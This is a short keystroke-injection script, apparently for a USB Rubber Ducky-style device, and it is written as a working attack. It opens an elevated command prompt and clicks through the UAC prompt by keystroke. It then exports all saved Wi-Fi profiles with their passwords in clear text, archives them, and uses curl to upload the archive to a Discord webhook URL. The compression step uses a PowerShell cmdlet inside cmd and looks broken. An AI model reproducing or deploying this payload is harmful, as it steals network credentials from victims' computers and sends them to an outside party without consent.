REM ######## INITIALIZATION ########

DELAY 2000

REM ######## STAGE1 ########

GUI r
DELAY 3000
STRING cmd
DELAY 1000
CTRL-SHIFT ENTER
DELAY 3000
LEFTARROW
DELAY 5000
ENTER
DELAY 5000
STRING mkdir C:\WiFiProfiles
ENTER
DELAY 1000
STRING cd C:\WiFiProfiles
ENTER
DELAY 1000
STRING netsh wlan export profile key=clear
ENTER

REM ######## STAGE2 ########

STRING Compress-Archive -Path C:\WiFiProfiles -DestinationPath C:\WiFiProfiles.zip
ENTER

STRING curl -X POST -H "Content-Type: multipart/form-data" -F "file=@C:\WiFiProfiles.zip" https://discord.com/api/webhooks/1196971918759313598/yIrrXm509i0oQ2jxCYal9Gmd1Yk3xXPVnWkWiA3Qllf6NXEoO2OpO6U-3pC003bRArBN
ENTER
